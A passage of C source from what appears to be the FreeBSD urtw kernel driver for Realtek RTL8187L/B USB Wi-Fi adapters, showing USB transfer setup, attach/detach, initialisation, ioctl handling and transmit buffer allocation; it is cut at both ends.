0x8e, 0x08, 0 }, { 0x8f, 0x00, 0 } }; #endif static usb_callback_t urtw_bulk_rx_callback; static usb_callback_t urtw_bulk_tx_callback; static usb_callback_t urtw_bulk_tx_status_callback; static const struct usb_config urtw_8187b_usbconfig[URTW_8187B_N_XFERS] = { [URTW_8187B_BULK_RX] = { .type = UE_BULK, .endpoint = 0x83, .direction = UE_DIR_IN, .bufsize = MCLBYTES, .flags = { .ext_buffer = 1, .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = urtw_bulk_rx_callback }, [URTW_8187B_BULK_TX_STATUS] = { .type = UE_BULK, .endpoint = 0x89, .direction = UE_DIR_IN, .bufsize = sizeof(uint64_t), .flags = { .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = urtw_bulk_tx_status_callback }, [URTW_8187B_BULK_TX_BE] = { .type = UE_BULK, .endpoint = URTW_8187B_TXPIPE_BE, .direction = UE_DIR_OUT, .bufsize = URTW_TX_MAXSIZE * URTW_TX_DATA_LIST_COUNT, .flags = { .force_short_xfer = 1, .pipe_bof = 1, }, .callback = urtw_bulk_tx_callback, .timeout = URTW_DATA_TIMEOUT }, [URTW_8187B_BULK_TX_BK] = { .type = UE_BULK, .endpoint = URTW_8187B_TXPIPE_BK, .direction = UE_DIR_OUT, .bufsize = URTW_TX_MAXSIZE, .flags = { .ext_buffer = 1, .force_short_xfer = 1, .pipe_bof = 1, }, .callback = urtw_bulk_tx_callback, .timeout = URTW_DATA_TIMEOUT }, [URTW_8187B_BULK_TX_VI] = { .type = UE_BULK, .endpoint = URTW_8187B_TXPIPE_VI, .direction = UE_DIR_OUT, .bufsize = URTW_TX_MAXSIZE, .flags = { .ext_buffer = 1, .force_short_xfer = 1, .pipe_bof = 1, }, .callback = urtw_bulk_tx_callback, .timeout = URTW_DATA_TIMEOUT }, [URTW_8187B_BULK_TX_VO] = { .type = UE_BULK, .endpoint = URTW_8187B_TXPIPE_VO, .direction = UE_DIR_OUT, .bufsize = URTW_TX_MAXSIZE, .flags = { .ext_buffer = 1, .force_short_xfer = 1, .pipe_bof = 1, }, .callback = urtw_bulk_tx_callback, .timeout = URTW_DATA_TIMEOUT }, [URTW_8187B_BULK_TX_EP12] = { .type = UE_BULK, .endpoint = 0xc, .direction = UE_DIR_OUT, .bufsize = URTW_TX_MAXSIZE, .flags = { .ext_buffer = 1, .force_short_xfer = 1, .pipe_bof = 1, }, .callback = urtw_bulk_tx_callback, .timeout = URTW_DATA_TIMEOUT } }; static const struct usb_config urtw_8187l_usbconfig[URTW_8187L_N_XFERS] = { [URTW_8187L_BULK_RX] = { .type = UE_BULK, .endpoint = 0x81, .direction = UE_DIR_IN, .bufsize = MCLBYTES, .flags = { .ext_buffer = 1, .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = urtw_bulk_rx_callback }, [URTW_8187L_BULK_TX_LOW] = { .type = UE_BULK, .endpoint = 0x2, .direction = UE_DIR_OUT, .bufsize = URTW_TX_MAXSIZE * URTW_TX_DATA_LIST_COUNT, .flags = { .force_short_xfer = 1, .pipe_bof = 1, }, .callback = urtw_bulk_tx_callback, .timeout = URTW_DATA_TIMEOUT }, [URTW_8187L_BULK_TX_NORMAL] = { .type = UE_BULK, .endpoint = 0x3, .direction = UE_DIR_OUT, .bufsize = URTW_TX_MAXSIZE, .flags = { .ext_buffer = 1, .force_short_xfer = 1, .pipe_bof = 1, }, .callback = urtw_bulk_tx_callback, .timeout = URTW_DATA_TIMEOUT }, }; static struct ieee80211vap *urtw_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void urtw_vap_delete(struct ieee80211vap *); static void urtw_init(void *); static void urtw_stop(struct ifnet *); static void urtw_stop_locked(struct ifnet *); static int urtw_ioctl(struct ifnet *, u_long, caddr_t); static void urtw_start(struct ifnet *); static int urtw_alloc_rx_data_list(struct urtw_softc *); static int urtw_alloc_tx_data_list(struct urtw_softc *); static int urtw_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void urtw_scan_start(struct ieee80211com *); static void urtw_scan_end(struct ieee80211com *); static void urtw_set_channel(struct ieee80211com *); static void urtw_update_mcast(struct ifnet *); static int urtw_tx_start(struct urtw_softc *, struct ieee80211_node *, struct mbuf *, struct urtw_data *, int); static int urtw_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void urtw_led_ch(void *); static void urtw_ledtask(void *, int); static void urtw_watchdog(void *); static void urtw_set_multi(void *); static int urtw_isbmode(uint16_t); static uint16_t urtw_rate2rtl(uint32_t); static uint16_t urtw_rtl2rate(uint32_t); static usb_error_t urtw_set_rate(struct urtw_softc *); static usb_error_t urtw_update_msr(struct urtw_softc *); static usb_error_t urtw_read8_c(struct urtw_softc *, int, uint8_t *); static usb_error_t urtw_read16_c(struct urtw_softc *, int, uint16_t *); static usb_error_t urtw_read32_c(struct urtw_softc *, int, uint32_t *); static usb_error_t urtw_write8_c(struct urtw_softc *, int, uint8_t); static usb_error_t urtw_write16_c(struct urtw_softc *, int, uint16_t); static usb_error_t urtw_write32_c(struct urtw_softc *, int, uint32_t); static usb_error_t urtw_eprom_cs(struct urtw_softc *, int); static usb_error_t urtw_eprom_ck(struct urtw_softc *); static usb_error_t urtw_eprom_sendbits(struct urtw_softc *, int16_t *, int); static usb_error_t urtw_eprom_read32(struct urtw_softc *, uint32_t, uint32_t *); static usb_error_t urtw_eprom_readbit(struct urtw_softc *, int16_t *); static usb_error_t urtw_eprom_writebit(struct urtw_softc *, int16_t); static usb_error_t urtw_get_macaddr(struct urtw_softc *); static usb_error_t urtw_get_txpwr(struct urtw_softc *); static usb_error_t urtw_get_rfchip(struct urtw_softc *); static usb_error_t urtw_led_init(struct urtw_softc *); static usb_error_t urtw_8185_rf_pins_enable(struct urtw_softc *); static usb_error_t urtw_8185_tx_antenna(struct urtw_softc *, uint8_t); static usb_error_t urtw_8187_write_phy(struct urtw_softc *, uint8_t, uint32_t); static usb_error_t urtw_8187_write_phy_ofdm_c(struct urtw_softc *, uint8_t, uint32_t); static usb_error_t urtw_8187_write_phy_cck_c(struct urtw_softc *, uint8_t, uint32_t); static usb_error_t urtw_8225_setgain(struct urtw_softc *, int16_t); static usb_error_t urtw_8225_usb_init(struct urtw_softc *); static usb_error_t urtw_8225_write_c(struct urtw_softc *, uint8_t, uint16_t); static usb_error_t urtw_8225_write_s16(struct urtw_softc *, uint8_t, int, uint16_t *); static usb_error_t urtw_8225_read(struct urtw_softc *, uint8_t, uint32_t *); static usb_error_t urtw_8225_rf_init(struct urtw_softc *); static usb_error_t urtw_8225_rf_set_chan(struct urtw_softc *, int); static usb_error_t urtw_8225_rf_set_sens(struct urtw_softc *, int); static usb_error_t urtw_8225_set_txpwrlvl(struct urtw_softc *, int); static usb_error_t urtw_8225_rf_stop(struct urtw_softc *); static usb_error_t urtw_8225v2_rf_init(struct urtw_softc *); static usb_error_t urtw_8225v2_rf_set_chan(struct urtw_softc *, int); static usb_error_t urtw_8225v2_set_txpwrlvl(struct urtw_softc *, int); static usb_error_t urtw_8225v2_setgain(struct urtw_softc *, int16_t); static usb_error_t urtw_8225_isv2(struct urtw_softc *, int *); static usb_error_t urtw_8225v2b_rf_init(struct urtw_softc *); static usb_error_t urtw_8225v2b_rf_set_chan(struct urtw_softc *, int); static usb_error_t urtw_read8e(struct urtw_softc *, int, uint8_t *); static usb_error_t urtw_write8e(struct urtw_softc *, int, uint8_t); static usb_error_t urtw_8180_set_anaparam(struct urtw_softc *, uint32_t); static usb_error_t urtw_8185_set_anaparam2(struct urtw_softc *, uint32_t); static usb_error_t urtw_intr_enable(struct urtw_softc *); static usb_error_t urtw_intr_disable(struct urtw_softc *); static usb_error_t urtw_reset(struct urtw_softc *); static usb_error_t urtw_led_on(struct urtw_softc *, int); static usb_error_t urtw_led_ctl(struct urtw_softc *, int); static usb_error_t urtw_led_blink(struct urtw_softc *); static usb_error_t urtw_led_mode0(struct urtw_softc *, int); static usb_error_t urtw_led_mode1(struct urtw_softc *, int); static usb_error_t urtw_led_mode2(struct urtw_softc *, int); static usb_error_t urtw_led_mode3(struct urtw_softc *, int); static usb_error_t urtw_rx_setconf(struct urtw_softc *); static usb_error_t urtw_rx_enable(struct urtw_softc *); static usb_error_t urtw_tx_enable(struct urtw_softc *sc); static void urtw_free_tx_data_list(struct urtw_softc *); static void urtw_free_rx_data_list(struct urtw_softc *); static void urtw_free_data_list(struct urtw_softc *, struct urtw_data data[], int, int); static usb_error_t urtw_adapter_start(struct urtw_softc *); static usb_error_t urtw_adapter_start_b(struct urtw_softc *); static usb_error_t urtw_set_mode(struct urtw_softc *, uint32_t); static usb_error_t urtw_8187b_cmd_reset(struct urtw_softc *); static usb_error_t urtw_do_request(struct urtw_softc *, struct usb_device_request *, void *); static usb_error_t urtw_8225v2b_set_txpwrlvl(struct urtw_softc *, int); static usb_error_t urtw_led_off(struct urtw_softc *, int); static void urtw_abort_xfers(struct urtw_softc *); static struct urtw_data * urtw_getbuf(struct urtw_softc *sc); static int urtw_compute_txtime(uint16_t, uint16_t, uint8_t, uint8_t); static void urtw_updateslot(struct ifnet *); static void urtw_updateslottask(void *, int); static void urtw_sysctl_node(struct urtw_softc *); static int urtw_match(device_t dev) { struct usb_attach_arg *uaa = device_get_ivars(dev); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != URTW_CONFIG_INDEX) return (ENXIO); if (uaa->info.bIfaceIndex != URTW_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(urtw_devs, sizeof(urtw_devs), uaa)); } static int urtw_attach(device_t dev) { const struct usb_config *setup_start; int ret = ENXIO; struct urtw_softc *sc = device_get_softc(dev); struct usb_attach_arg *uaa = device_get_ivars(dev); struct ieee80211com *ic; struct ifnet *ifp; uint8_t bands, iface_index = URTW_IFACE_INDEX; /* XXX */ uint16_t n_setup; uint32_t data; usb_error_t error; device_set_usb_desc(dev); sc->sc_dev = dev; sc->sc_udev = uaa->device; if (USB_GET_DRIVER_INFO(uaa) == URTW_REV_RTL8187B) sc->sc_flags |= URTW_RTL8187B; #ifdef URTW_DEBUG sc->sc_debug = urtw_debug; #endif mtx_init(&sc->sc_mtx, device_get_nameunit(sc->sc_dev), MTX_NETWORK_LOCK, MTX_DEF); usb_callout_init_mtx(&sc->sc_led_ch, &sc->sc_mtx, 0); TASK_INIT(&sc->sc_led_task, 0, urtw_ledtask, sc); TASK_INIT(&sc->sc_updateslot_task, 0, urtw_updateslottask, sc); callout_init(&sc->sc_watchdog_ch, 0); if (sc->sc_flags & URTW_RTL8187B) { setup_start = urtw_8187b_usbconfig; n_setup = URTW_8187B_N_XFERS; } else { setup_start = urtw_8187l_usbconfig; n_setup = URTW_8187L_N_XFERS; } error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, setup_start, n_setup, sc, &sc->sc_mtx); if (error) { device_printf(dev, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); ret = ENXIO; goto fail0; } if (sc->sc_flags & URTW_RTL8187B) { sc->sc_tx_dma_buf = usbd_xfer_get_frame_buffer(sc->sc_xfer[ URTW_8187B_BULK_TX_BE], 0); } else { sc->sc_tx_dma_buf = usbd_xfer_get_frame_buffer(sc->sc_xfer[ URTW_8187L_BULK_TX_LOW], 0); } URTW_LOCK(sc); urtw_read32_m(sc, URTW_RX, &data); sc->sc_epromtype = (data & URTW_RX_9356SEL) ? URTW_EEPROM_93C56 : URTW_EEPROM_93C46; error = urtw_get_rfchip(sc); if (error != 0) goto fail; error = urtw_get_macaddr(sc); if (error != 0) goto fail; error = urtw_get_txpwr(sc); if (error != 0) goto fail; error = urtw_led_init(sc); if (error != 0) goto fail; URTW_UNLOCK(sc); sc->sc_rts_retry = URTW_DEFAULT_RTS_RETRY; sc->sc_tx_retry = URTW_DEFAULT_TX_RETRY; sc->sc_currate = 3; sc->sc_preamble_mode = urtw_preamble_mode; ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not allocate ifnet\n"); ret = ENOMEM; goto fail1; } ifp->if_softc = sc; if_initname(ifp, "urtw", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = urtw_init; ifp->if_ioctl = urtw_ioctl; ifp->if_start = urtw_start; /* XXX URTW_TX_DATA_LIST_COUNT */ IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic = ifp->if_l2com; ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* default to BSS mode */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA | /* station mode */ IEEE80211_C_MONITOR | /* monitor mode supported */ IEEE80211_C_TXPMGT | /* tx power management */ IEEE80211_C_SHPREAMBLE | /* short preamble supported */ IEEE80211_C_SHSLOT | /* short slot time supported */ IEEE80211_C_BGSCAN | /* capable of bg scanning */ IEEE80211_C_WPA; /* 802.11i */ bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_bssid); ic->ic_raw_xmit = urtw_raw_xmit; ic->ic_scan_start = urtw_scan_start; ic->ic_scan_end = urtw_scan_end; ic->ic_set_channel = urtw_set_channel; ic->ic_updateslot = urtw_updateslot; ic->ic_vap_create = urtw_vap_create; ic->ic_vap_delete = urtw_vap_delete; ic->ic_update_mcast = urtw_update_mcast; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), URTW_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), URTW_RX_RADIOTAP_PRESENT); urtw_sysctl_node(sc); if (bootverbose) ieee80211_announce(ic); return (0); fail: URTW_UNLOCK(sc); fail1: usbd_transfer_unsetup(sc->sc_xfer, (sc->sc_flags & URTW_RTL8187B) ? URTW_8187B_N_XFERS : URTW_8187L_N_XFERS); fail0: return (ret); } static int urtw_detach(device_t dev) { struct urtw_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; unsigned int x; unsigned int n_xfers; /* Prevent further ioctls */ URTW_LOCK(sc); sc->sc_flags |= URTW_DETACHED; URTW_UNLOCK(sc); urtw_stop(ifp); ieee80211_draintask(ic, &sc->sc_updateslot_task); ieee80211_draintask(ic, &sc->sc_led_task); usb_callout_drain(&sc->sc_led_ch); callout_drain(&sc->sc_watchdog_ch); n_xfers = (sc->sc_flags & URTW_RTL8187B) ? URTW_8187B_N_XFERS : URTW_8187L_N_XFERS; /* prevent further allocations from RX/TX data lists */ URTW_LOCK(sc); STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); URTW_UNLOCK(sc); /* drain USB transfers */ for (x = 0; x != n_xfers; x++) usbd_transfer_drain(sc->sc_xfer[x]); /* free data buffers */ URTW_LOCK(sc); urtw_free_tx_data_list(sc); urtw_free_rx_data_list(sc); URTW_UNLOCK(sc); /* free USB transfers and some data buffers */ usbd_transfer_unsetup(sc->sc_xfer, n_xfers); ieee80211_ifdetach(ic); if_free(ifp); mtx_destroy(&sc->sc_mtx); return (0); } static void urtw_free_tx_data_list(struct urtw_softc *sc) { urtw_free_data_list(sc, sc->sc_tx, URTW_TX_DATA_LIST_COUNT, 0); } static void urtw_free_rx_data_list(struct urtw_softc *sc) { urtw_free_data_list(sc, sc->sc_rx, URTW_RX_DATA_LIST_COUNT, 1); } static void urtw_free_data_list(struct urtw_softc *sc, struct urtw_data data[], int ndata, int fillmbuf) { int i; for (i = 0; i < ndata; i++) { struct urtw_data *dp = &data[i]; if (fillmbuf == 1) { if (dp->m != NULL) { m_freem(dp->m); dp->m = NULL; dp->buf = NULL; } } else { dp->buf = NULL; } if (dp->ni != NULL) { ieee80211_free_node(dp->ni); dp->ni = NULL; } } } static struct ieee80211vap * urtw_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct urtw_vap *uvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return (NULL); uvp = (struct urtw_vap *) malloc(sizeof(struct urtw_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (uvp == NULL) return (NULL); vap = &uvp->vap; /* enable s/w bmiss handling for sta mode */ if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac) != 0) { /* out of memory */ free(uvp, M_80211_VAP); return (NULL); } /* override state transition machine */ uvp->newstate = vap->iv_newstate; vap->iv_newstate = urtw_newstate; /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return (vap); } static void urtw_vap_delete(struct ieee80211vap *vap) { struct urtw_vap *uvp = URTW_VAP(vap); ieee80211_vap_detach(vap); free(uvp, M_80211_VAP); } static void urtw_init_locked(void *arg) { int ret; struct urtw_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; usb_error_t error; if (ifp->if_drv_flags & IFF_DRV_RUNNING) urtw_stop_locked(ifp); error = (sc->sc_flags & URTW_RTL8187B) ? urtw_adapter_start_b(sc) : urtw_adapter_start(sc); if (error != 0) goto fail; /* reset softc variables */ sc->sc_txtimer = 0; if (!(sc->sc_flags & URTW_INIT_ONCE)) { ret = urtw_alloc_rx_data_list(sc); if (ret != 0) goto fail; ret = urtw_alloc_tx_data_list(sc); if (ret != 0) goto fail; sc->sc_flags |= URTW_INIT_ONCE; } error = urtw_rx_enable(sc); if (error != 0) goto fail; error = urtw_tx_enable(sc); if (error != 0) goto fail; if (sc->sc_flags & URTW_RTL8187B) usbd_transfer_start(sc->sc_xfer[URTW_8187B_BULK_TX_STATUS]); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->sc_watchdog_ch, hz, urtw_watchdog, sc); fail: return; } static void urtw_init(void *arg) { struct urtw_softc *sc = arg; URTW_LOCK(sc); urtw_init_locked(arg); URTW_UNLOCK(sc); } static usb_error_t urtw_adapter_start_b(struct urtw_softc *sc) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) uint8_t data8; usb_error_t error; error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_read8_m(sc, URTW_CONFIG3, &data8); urtw_write8_m(sc, URTW_CONFIG3, data8 | URTW_CONFIG3_ANAPARAM_WRITE | URTW_CONFIG3_GNT_SELECT); urtw_write32_m(sc, URTW_ANAPARAM2, URTW_8187B_8225_ANAPARAM2_ON); urtw_write32_m(sc, URTW_ANAPARAM, URTW_8187B_8225_ANAPARAM_ON); urtw_write8_m(sc, URTW_ANAPARAM3, URTW_8187B_8225_ANAPARAM3_ON); urtw_write8_m(sc, 0x61, 0x10); urtw_read8_m(sc, 0x62, &data8); urtw_write8_m(sc, 0x62, data8 & ~(1 << 5)); urtw_write8_m(sc, 0x62, data8 | (1 << 5)); urtw_read8_m(sc, URTW_CONFIG3, &data8); data8 &= ~URTW_CONFIG3_ANAPARAM_WRITE; urtw_write8_m(sc, URTW_CONFIG3, data8); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; error = urtw_8187b_cmd_reset(sc); if (error) goto fail; error = sc->sc_rf_init(sc); if (error != 0) goto fail; urtw_write8_m(sc, URTW_CMD, URTW_CMD_RX_ENABLE | URTW_CMD_TX_ENABLE); /* fix RTL8187B RX stall */ error = urtw_intr_enable(sc); if (error) goto fail; error = urtw_write8e(sc, 0x41, 0xf4); if (error) goto fail; error = urtw_write8e(sc, 0x40, 0x00); if (error) goto fail; error = urtw_write8e(sc, 0x42, 0x00); if (error) goto fail; error = urtw_write8e(sc, 0x42, 0x01); if (error) goto fail; error = urtw_write8e(sc, 0x40, 0x0f); if (error) goto fail; error = urtw_write8e(sc, 0x42, 0x00); if (error) goto fail; error = urtw_write8e(sc, 0x42, 0x01); if (error) goto fail; urtw_read8_m(sc, 0xdb, &data8); urtw_write8_m(sc, 0xdb, data8 | (1 << 2)); urtw_write16_m(sc, 0x372, 0x59fa); urtw_write16_m(sc, 0x374, 0x59d2); urtw_write16_m(sc, 0x376, 0x59d2); urtw_write16_m(sc, 0x378, 0x19fa); urtw_write16_m(sc, 0x37a, 0x19fa); urtw_write16_m(sc, 0x37c, 0x00d0); urtw_write8_m(sc, 0x61, 0); urtw_write8_m(sc, 0x180, 0x0f); urtw_write8_m(sc, 0x183, 0x03); urtw_write8_m(sc, 0xda, 0x10); urtw_write8_m(sc, 0x24d, 0x08); urtw_write32_m(sc, URTW_HSSI_PARA, 0x0600321b); urtw_write16_m(sc, 0x1ec, 0x800); /* RX MAX SIZE */ fail: return (error); #undef N } static usb_error_t urtw_adapter_start(struct urtw_softc *sc) { usb_error_t error; error = urtw_reset(sc); if (error) goto fail; urtw_write8_m(sc, URTW_ADDR_MAGIC1, 0); urtw_write8_m(sc, URTW_GPIO, 0); /* for led */ urtw_write8_m(sc, URTW_ADDR_MAGIC1, 4); error = urtw_led_ctl(sc, URTW_LED_CTL_POWER_ON); if (error != 0) goto fail; error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; /* applying MAC address again. */ urtw_write32_m(sc, URTW_MAC0, ((uint32_t *)sc->sc_bssid)[0]); urtw_write16_m(sc, URTW_MAC4, ((uint32_t *)sc->sc_bssid)[1] & 0xffff); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; error = urtw_update_msr(sc); if (error) goto fail; urtw_write32_m(sc, URTW_INT_TIMEOUT, 0); urtw_write8_m(sc, URTW_WPA_CONFIG, 0); urtw_write8_m(sc, URTW_RATE_FALLBACK, URTW_RATE_FALLBACK_ENABLE | 0x1); error = urtw_set_rate(sc); if (error != 0) goto fail; error = sc->sc_rf_init(sc); if (error != 0) goto fail; if (sc->sc_rf_set_sens != NULL) sc->sc_rf_set_sens(sc, sc->sc_sens); /* XXX correct? to call write16 */ urtw_write16_m(sc, URTW_PSR, 1); urtw_write16_m(sc, URTW_ADDR_MAGIC2, 0x10); urtw_write8_m(sc, URTW_TALLY_SEL, 0x80); urtw_write8_m(sc, URTW_ADDR_MAGIC3, 0x60); /* XXX correct? to call write16 */ urtw_write16_m(sc, URTW_PSR, 0); urtw_write8_m(sc, URTW_ADDR_MAGIC1, 4); error = urtw_intr_enable(sc); if (error != 0) goto fail; fail: return (error); } static usb_error_t urtw_set_mode(struct urtw_softc *sc, uint32_t mode) { uint8_t data; usb_error_t error; urtw_read8_m(sc, URTW_EPROM_CMD, &data); data = (data & ~URTW_EPROM_CMD_MASK) | (mode << URTW_EPROM_CMD_SHIFT); data = data & ~(URTW_EPROM_CS | URTW_EPROM_CK); urtw_write8_m(sc, URTW_EPROM_CMD, data); fail: return (error); } static usb_error_t urtw_8187b_cmd_reset(struct urtw_softc *sc) { int i; uint8_t data8; usb_error_t error; /* XXX the code can be duplicate with urtw_reset(). */ urtw_read8_m(sc, URTW_CMD, &data8); data8 = (data8 & 0x2) | URTW_CMD_RST; urtw_write8_m(sc, URTW_CMD, data8); for (i = 0; i < 20; i++) { usb_pause_mtx(&sc->sc_mtx, 2); urtw_read8_m(sc, URTW_CMD, &data8); if (!(data8 & URTW_CMD_RST)) break; } if (i >= 20) { device_printf(sc->sc_dev, "reset timeout\n"); goto fail; } fail: return (error); } static usb_error_t urtw_do_request(struct urtw_softc *sc, struct usb_device_request *req, void *data) { usb_error_t err; int ntries = 10; URTW_ASSERT_LOCKED(sc); while (ntries--) { err = usbd_do_request_flags(sc->sc_udev, &sc->sc_mtx, req, data, 0, NULL, 250 /* ms */); if (err == 0) break; DPRINTF(sc, URTW_DEBUG_INIT, "Control request failed, %s (retrying)\n", usbd_errstr(err)); usb_pause_mtx(&sc->sc_mtx, hz / 100); } return (err); } static void urtw_stop_locked(struct ifnet *ifp) { struct urtw_softc *sc = ifp->if_softc; uint8_t data8; usb_error_t error; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); error = urtw_intr_disable(sc); if (error) goto fail; urtw_read8_m(sc, URTW_CMD, &data8); data8 &= ~(URTW_CMD_RX_ENABLE | URTW_CMD_TX_ENABLE); urtw_write8_m(sc, URTW_CMD, data8); error = sc->sc_rf_stop(sc); if (error != 0) goto fail; error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_read8_m(sc, URTW_CONFIG4, &data8); urtw_write8_m(sc, URTW_CONFIG4, data8 | URTW_CONFIG4_VCOOFF); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; fail: if (error) device_printf(sc->sc_dev, "failed to stop (%s)\n", usbd_errstr(error)); usb_callout_stop(&sc->sc_led_ch); callout_stop(&sc->sc_watchdog_ch); urtw_abort_xfers(sc); } static void urtw_stop(struct ifnet *ifp) { struct urtw_softc *sc = ifp->if_softc; URTW_LOCK(sc); urtw_stop_locked(ifp); URTW_UNLOCK(sc); } static void urtw_abort_xfers(struct urtw_softc *sc) { int i, max; URTW_ASSERT_LOCKED(sc); max = (sc->sc_flags & URTW_RTL8187B) ? URTW_8187B_N_XFERS : URTW_8187L_N_XFERS; /* abort any pending transfers */ for (i = 0; i < max; i++) usbd_transfer_stop(sc->sc_xfer[i]); } static int urtw_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct urtw_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error; int startall = 0; URTW_LOCK(sc); error = (sc->sc_flags & URTW_DETACHED) ? ENXIO : 0; URTW_UNLOCK(sc); if (error) return (error); switch (cmd) { case SIOCSIFFLAGS: if (ifp->if_flags & IFF_UP) { if (ifp->if_drv_flags & IFF_DRV_RUNNING) { if ((ifp->if_flags ^ sc->sc_if_flags) & (IFF_ALLMULTI | IFF_PROMISC)) urtw_set_multi(sc); } else { urtw_init(ifp->if_softc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) urtw_stop(ifp); } sc->sc_if_flags = ifp->if_flags; if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return (error); } static void urtw_start(struct ifnet *ifp) { struct urtw_data *bf; struct urtw_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; URTW_LOCK(sc); for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; bf = urtw_getbuf(sc); if (bf == NULL) { IFQ_DRV_PREPEND(&ifp->if_snd, m); break; } ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; m->m_pkthdr.rcvif = NULL; if (urtw_tx_start(sc, ni, m, bf, URTW_PRIORITY_NORMAL) != 0) { ifp->if_oerrors++; STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); ieee80211_free_node(ni); break; } sc->sc_txtimer = 5; callout_reset(&sc->sc_watchdog_ch, hz, urtw_watchdog, sc); } URTW_UNLOCK(sc); } static int urtw_alloc_data_list(struct urtw_softc *sc, struct urtw_data data[], int ndata, int maxsz, void *dma_buf) { int i, error; for (i = 0; i < ndata; i++) { struct urtw_data *dp = &data[i]; dp->sc = sc; if (dma_buf == NULL) { dp->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (dp->m == NULL) { device_printf(sc->sc_dev, "could not allocate rx mbuf\n"); error = ENOMEM; goto fail; } dp->buf = mtod(dp->m, uint8_t *); } else { dp->m = NULL; dp->buf = ((uint8_t *)dma_buf) + (i * maxsz); } dp->ni = NULL; } return (0); fail: urtw_free_data_list(sc, data, ndata, 1); return (error); } static int urtw_alloc_rx_data_list(struct urtw_softc *sc) { int error, i; error = urtw_alloc_data_list(sc, sc->sc_rx, URTW_RX_DATA_LIST_COUNT, MCLBYTES, NULL /* mbufs */); if (error != 0) return (error); STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); for (i = 0; i < URTW_RX_DATA_LIST_COUNT; i++) STAILQ_INSERT_HEAD(&sc->sc_rx_inactive, &sc->sc_rx[i], next); return (0); } static int urtw_alloc_tx_data_list(struct urtw_softc *sc) { int error, i; error = urtw_alloc_data_list(sc, sc->sc_tx, URTW_TX_DATA_LIST_COUNT, URTW_TX_MAXSIZE, sc->sc_tx_dma_buf /* no mbufs */); if (error != 0) return (error); STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); for (i = 0; i < URTW_TX_DATA_LIST_COUNT; i++) STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, &sc->sc_tx[i], next); return (0); } static int urtw_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; 